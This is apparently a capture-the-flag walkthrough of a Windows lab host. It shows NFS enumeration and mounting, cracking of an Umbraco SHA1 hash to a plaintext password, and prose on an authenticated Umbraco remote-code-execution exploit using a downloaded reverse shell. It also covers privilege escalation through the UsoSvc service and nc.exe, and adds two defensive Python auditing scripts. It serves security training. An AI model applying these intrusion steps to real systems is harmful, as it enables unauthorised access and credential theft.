$ nmap -p- --min-rate 5000 10.129.227.150
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 04:27 EDT
Warning: 10.129.227.150 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.227.150
Host is up (0.035s latency).
Not shown: 65026 closed tcp ports (conn-refused), 494 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
NFS
Network File System (NFS) was exposed on port 2049, which is not a port I see often. This service can expose very interesting files and permissions, so let's enumerate its exports with showmount.
$ showmount -e 10.129.227.150
Export list for 10.129.227.150:
/site_backups (everyone)
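The export list above is the whole finding: `(everyone)` is how showmount renders a wildcard client, so any host that can reach port 2049 can mount the backup. The following is an added example, not part of the original writeup, that parses `showmount -e` output and flags world-mountable exports, wildcard hostnames and overly broad networks, the checks an administrator would run across their own NFS servers. The writeup's export list is embedded as one sample; the second sample host and its paths are constructed, and the "broad network" threshold is an assumption.

```python
"""Audit `showmount -e` output for exports that any client can mount.

Added example (not part of the original writeup). It parses the text that
showmount prints, one export per line as "<path> <client list>", where a
client list of "*" in /etc/exports is rendered as "(everyone)". The sample
text below is the export list from the writeup plus a constructed second
host used to show the other client-list shapes.
"""
import ipaddress
from dataclasses import dataclass, field

# How showmount renders an /etc/exports wildcard client of "*".
WORLD_MARKERS = {"(everyone)", "*", "everyone"}
# Networks wider than this are flagged as overly broad (assumption: a /16
# or wider is rarely an intentional scope for a file share).
BROAD_PREFIX_V4 = 16


@dataclass
class ExportFinding:
    path: str
    clients: list[str]
    world_mountable: bool = False
    notes: list[str] = field(default_factory=list)


def _classify_client(path: str, client: str, finding: ExportFinding) -> None:
    """Attach a note to the finding when a client entry is overly permissive."""
    if client in WORLD_MARKERS:
        finding.world_mountable = True
        finding.notes.append(f"{path}: mountable by any host")
        return
    if client.startswith("@"):
        return  # NIS netgroup; its membership is defined elsewhere
    if client.startswith("*") or "?" in client:
        finding.notes.append(f"{path}: wildcard hostname pattern {client}")
        return
    try:
        net = ipaddress.ip_network(client, strict=False)
    except ValueError:
        return  # plain hostname, nothing to flag
    if net.version == 4 and net.prefixlen < BROAD_PREFIX_V4:
        finding.notes.append(f"{path}: exported to broad network {net}")


def parse_showmount(text: str) -> list[ExportFinding]:
    """Turn showmount -e output into one ExportFinding per exported path."""
    findings: list[ExportFinding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        client_field = parts[1] if len(parts) > 1 else ""
        clients = [c.strip() for c in client_field.split(",") if c.strip()]
        finding = ExportFinding(path=path, clients=clients)
        for client in clients:
            _classify_client(path, client, finding)
        findings.append(finding)
    return findings


def world_mountable_paths(text: str) -> list[str]:
    """Paths that any client on the network can mount; the case from the writeup."""
    return [f.path for f in parse_showmount(text) if f.world_mountable]


# Export list captured in the writeup (the real finding) ...
SAMPLE_FROM_WRITEUP = """\
Export list for 10.129.227.150:
/site_backups (everyone)
"""

# ... and a constructed list with scoped, broad and wildcard clients.
SAMPLE_CONSTRUCTED = """\
Export list for nfs.example.test:
/srv/build   10.10.0.0/24,@buildhosts
/home        10.0.0.0/8,*.corp.example.test
/public      (everyone)
"""

if __name__ == "__main__":
    for sample in (SAMPLE_FROM_WRITEUP, SAMPLE_CONSTRUCTED):
        for finding in parse_showmount(sample):
            status = "WORLD" if finding.world_mountable else "scoped"
            print(f"{status:6} {finding.path} -> {','.join(finding.clients)}")
            for note in finding.notes:
                print("       note:", note)
```

Feed it the captured output of `showmount -e <server>` for each NFS server in an inventory; anything reported as WORLD should either be restricted to the hosts that need it in /etc/exports or firewalled, and a backup directory like the one here should not be exported at all.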
We can mount onto this and view the files inside:
$ sudo mount -t nfs 10.129.227.150:/site_backups /mnt/
$ ls -la
total 159
drwx------ 2 nobody 4294967294 4096 Feb 23 2020 .
drwxr-xr-x 19 root root 36864 Apr 22 05:16 ..
drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 2020 bin
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Config
drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Media
drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 2020 Web.config
Going through the folders, we find an Umbraco SDF database (Umbraco.sdf) in App_Data, which normally contains user password hashes.
$ ls
cache Logs Models packages TEMP umbraco.config Umbraco.sdf
Running strings on it produces a lot of output. Near the top there appear to be SHA1 hashes, which we can feed to john:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2023-05-02 04:34) 1.538g/s 15113Kp/s 15113Kc/s 15113KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
So now we have some credentials at least.
Umbraco RCE
There were hints that Umbraco was used to host the sites, so let's view port 80. It seems to be a blog page:
The login page for the website is located at the /Umbraco directory. We can log in with the email address and password we found earlier.
After logging in, we can enumerate the version that it is running.
This version of Umbraco is vulnerable to an authenticated RCE exploit:
Take note of the cmd and FileName parameters in the payload variable. In my case I used PowerShell to download and execute a reverse shell script.
Privilege Escalation
PowerUp
We can first enumerate our privileges as the user:
PS C:\windows\tasks> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
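Reading a `whoami /priv` table by eye is error-prone, and only a handful of the listed privileges matter for escalation. The following is an added example, not part of the original writeup, that parses the table and reports the enabled privileges from a well-known watch list, plus the watch-list privileges a token merely holds, since a process can re-enable a privilege that is present but disabled. The sample table is the one captured above; the watch list and its descriptions are this example's own.

```python
"""Triage `whoami /priv` output for privileges that matter for escalation.

Added example (not part of the original writeup). It parses the table that
whoami /priv prints and returns the enabled privileges that are commonly
abusable, so a responder reading a captured shell session, or an admin
reviewing a service account, sees the ones that matter first. The sample
below is the table shown in the writeup.
"""
import re

# Privileges that let a process act in another security context or bypass
# object checks. Well-known set, not exhaustive; descriptions are ours.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate tokens of clients that connect to the process",
    "SeAssignPrimaryTokenPrivilege": "launch processes under another account's token",
    "SeDebugPrivilege": "open and manipulate any process, including system ones",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of objects and then change their ACL",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
}

# A row looks like "<SeName> <description words...> <Enabled|Disabled>".
# "Disabled?" also accepts a trailing-truncated "Disable", which shows up
# in copied terminal output.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled?)\s*$")


def parse_whoami_priv(text: str) -> dict[str, bool]:
    """Map privilege name -> True if enabled, False if disabled."""
    privileges: dict[str, bool] = {}
    for raw in text.splitlines():
        match = _ROW.match(raw.strip())
        if match:
            name, _description, state = match.groups()
            privileges[name] = state == "Enabled"
    return privileges


def high_risk_enabled(privileges: dict[str, bool]) -> list[tuple[str, str]]:
    """Enabled watch-list privileges, each with why it matters."""
    return [
        (name, HIGH_RISK_PRIVILEGES[name])
        for name in sorted(privileges)
        if privileges[name] and name in HIGH_RISK_PRIVILEGES
    ]


def high_risk_held(privileges: dict[str, bool]) -> list[str]:
    """Watch-list privileges present at all; a disabled one can be enabled by
    the holder with AdjustTokenPrivileges, so it still counts when reviewing
    what an account is allowed to do."""
    return sorted(name for name in privileges if name in HIGH_RISK_PRIVILEGES)


# The table from the writeup, as captured in the shell session above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    print(f"{len(privs)} privileges parsed")
    for name, why in high_risk_enabled(privs):
        print(f"ENABLED  {name}: {why}")
    for name in high_risk_held(privs):
        if not privs[name]:
            print(f"held     {name} (disabled, but the token carries it)")
```

On an IIS host the application pool identity holds SeImpersonatePrivilege by design, so seeing it after a web application compromise is expected rather than a misconfiguration; the fix is patching the web application that gave the attacker a shell, and the detection opportunity is the web worker process spawning a shell or a downloader.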
We see that we have a number of privileges, and most importantly SeImpersonatePrivilege is enabled. This means that we probably have some control over services, which could be used for privilege escalation. I used PowerUp.ps1 to exploit this system.
We have control over the UsoSvc service. With this, we can run commands as the SYSTEM user. All we need to do is download nc.exe to the machine and run it as the administrator.